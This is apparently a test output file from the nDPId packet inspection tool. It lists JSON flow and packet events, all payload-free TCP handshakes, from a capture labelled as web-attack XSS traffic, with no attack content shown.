+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":424,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347012617,"flow_last_seen":1499347012617,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347012617,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52696,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1499347012617,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347012617,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8mKRAAD4GLSysEAABwKgKMs3YAFAU4YtpAAAAAKACchDbigAAAgQFtAQCCAoBORPNAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1499347012617,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347012617,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzdgtNmaCFOGLaqAScSBfigAAAgQFtAQCCAoD4uVEATkTzQEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1499347012618,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347012618,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0mKVAAD4GLTOsEAABwKgKMs3YAFAU4YtqLTZmg4AQAOX+kQAAAQEICgE5E80D4uVE"} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":439,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347015165,"flow_last_seen":1499347015165,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347015165,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52722,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1499347015165,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347015165,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8wXxAAD4GBFSsEAABwKgKMs3yAFDEv9c2AAAAAKACchDdRwAAAgQFtAQCCAoBORZKAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1499347015165,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347015165,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzfKguKOtxL\/XN6AScSCuHQAAAgQFtAQCCAoD4ufAATkWSgEDAwc="} 
+00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1499347015166,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347015166,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0wX1AAD4GBFusEAABwKgKMs3yAFDEv9c3oLijroAQAOVNJQAAAQEICgE5FkoD4ufA"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":451,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347016455,"flow_last_seen":1499347016455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347016455,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52736,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":451,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1499347016455,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347016455,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8hwdAAD4GPsmsEAABwKgKMs4AAFB8BZCLAAAAAKACchBrXQAAAgQFtAQCCAoBOReMAAAAAAEDAwc="} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":452,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1499347016455,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347016455,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzgBumELLfAWQjKAScSDN8gAAAgQFtAQCCAoD4ukDATkXjAEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":453,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1499347016455,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347016455,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0hwhAAD4GPtCsEAABwKgKMs4AAFB8BZCMbphCzIAQAOVs+gAAAQEICgE5F4wD4ukD"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347017745,"flow_last_seen":1499347017745,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347017745,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52750,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1499347017745,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347017745,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8p+RAAD4GHeysEAABwKgKMs4OAFCFw78rAAAAAKACchAxrgAAAgQFtAQCCAoBORjPAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":464,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1499347017745,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347017745,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzg5V15svhcO\/LKAScSBTXgAAAgQFtAQCCAoD4upFATkYzwEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":465,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1499347017746,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347017746,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0p+VAAD4GHfOsEAABwKgKMs4OAFCFw78sVdebMIAQAOXyZQAAAQEICgE5GM8D4upF"} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":481,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347020329,"flow_last_seen":1499347020329,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347020329,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52776,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":481,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1499347020329,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347020329,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8BsFAAD4Gvw+sEAABwKgKMs4oAFCq7R2UAAAAAKACchCrewAAAgQFtAQCCAoBORtVAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":482,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1499347020329,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347020329,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzijgzD+Kqu0dlaAScSCbVAAAAgQFtAQCCAoD4uzMATkbVQEDAwc="} 
+00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":483,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1499347020330,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347020330,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0BsJAAD4GvxasEAABwKgKMs4oAFCq7R2V4Mw\/i4AQAOU6XAAAAQEICgE5G1UD4uzM"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":496,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347021621,"flow_last_seen":1499347021621,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347021621,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52790,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":496,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1499347021621,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347021621,"pkt":"ABm5CmnxAMGxFOsxCABFAAA899BAAD4Gzf+sEAABwKgKMs42AFBUD+tIAAAAAKACchAzVAAAAgQFtAQCCAoBORyYAAAAAAEDAwc="} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":497,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1499347021621,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347021621,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzjY7BBUuVA\/rSaAScSDyDwAAAgQFtAQCCAoD4u4OATkcmAEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":498,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1499347021622,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347021622,"pkt":"ABm5CmnxAMGxFOsxCABFAAA099FAAD4GzgasEAABwKgKMs42AFBUD+tJOwQVL4AQAOWRFwAAAQEICgE5HJgD4u4O"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":514,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347024196,"flow_last_seen":1499347024196,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347024196,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52816,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":514,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1499347024196,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347024196,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8zI9AAD4G+UCsEAABwKgKMs5QAFAU3NOUAAAAAKACchCHngAAAgQFtAQCCAoBOR8bAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":515,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1499347024196,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347024196,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzlADb\/iqFNzTlaAScSCX7gAAAgQFtAQCCAoD4vCSATkfGwEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":516,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1499347024197,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347024197,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0zJBAAD4G+UesEAABwKgKMs5QAFAU3NOVA2\/4q4AQAOU29QAAAQEICgE5HxwD4vCS"} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":523,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347025509,"flow_last_seen":1499347025509,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347025509,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52830,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":523,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1499347025509,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347025509,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8MX5AAD4GlFKsEAABwKgKMs5eAFDxhxEaAAAAAKACchBsFgAAAgQFtAQCCAoBOSBkAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":524,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1499347025510,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347025510,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzl7gFzLu8YcRG6AScSBkMQAAAgQFtAQCCAoD4vHbATkgZAEDAwc="} 
+00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":525,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1499347025510,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347025510,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0MX9AAD4GlFmsEAABwKgKMs5eAFDxhxEb4Bcy74AQAOUDOQAAAQEICgE5IGQD4vHb"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":544,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347028086,"flow_last_seen":1499347028086,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347028086,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52856,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":544,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1499347028086,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347028086,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8aaVAAD4GXCusEAABwKgKMs54AFBiKUtNAAAAAKACchC+owAAAgQFtAQCCAoBOSLoAAAAAAEDAwc="} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":545,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1499347028086,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347028086,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQznggYwiEYilLTqAScSCeWQAAAgQFtAQCCAoD4vRfATki6AEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":546,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1499347028087,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347028087,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0aaZAAD4GXDKsEAABwKgKMs54AFBiKUtOIGMIhYAQAOU9YQAAAQEICgE5IugD4vRf"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":553,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347029372,"flow_last_seen":1499347029372,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347029372,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52870,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1499347029372,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347029372,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8qGFAAD4GHW+sEAABwKgKMs6GAFAx0YxIAAAAAKACchCssQAAAgQFtAQCCAoBOSQpAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1499347029372,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347029372,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzoZSq4KNMdGMSaAScSDe1AAAAgQFtAQCCAoD4vWgATkkKQEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":555,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1499347029373,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347029373,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0qGJAAD4GHXasEAABwKgKMs6GAFAx0YxJUquCjoAQAOV92wAAAQEICgE5JCoD4vWg"} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":568,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347030639,"flow_last_seen":1499347030639,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347030639,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52884,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":568,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1499347030639,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347030639,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jW9AAD4GOGGsEAABwKgKMs6UAFA36qgJAAAAAKACchCJjAAAAgQFtAQCCAoBOSVmAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":569,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1499347030639,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347030639,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzpQiO+l4N+qoCqAScSCD9wAAAgQFtAQCCAoD4vbdATklZgEDAwc="} 
+00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":570,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1499347030640,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347030640,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jXBAAD4GOGisEAABwKgKMs6UAFA36qgKIjvpeYAQAOUi\/wAAAQEICgE5JWYD4vbd"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":583,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347033203,"flow_last_seen":1499347033203,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347033203,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52910,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":583,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1499347033203,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347033203,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8AN5AAD4GxPKsEAABwKgKMs6uAFDsGCc5AAAAAKACchBTkwAAAgQFtAQCCAoBOSfnAAAAAAEDAwc="} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":584,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1499347033204,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347033204,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzq5aBdhx7BgnOqAScSAkugAAAgQFtAQCCAoD4vleATkn5wEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":585,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1499347033204,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347033204,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0AN9AAD4GxPmsEAABwKgKMs6uAFDsGCc6WgXYcoAQAOXDwQAAAQEICgE5J+cD4vle"} 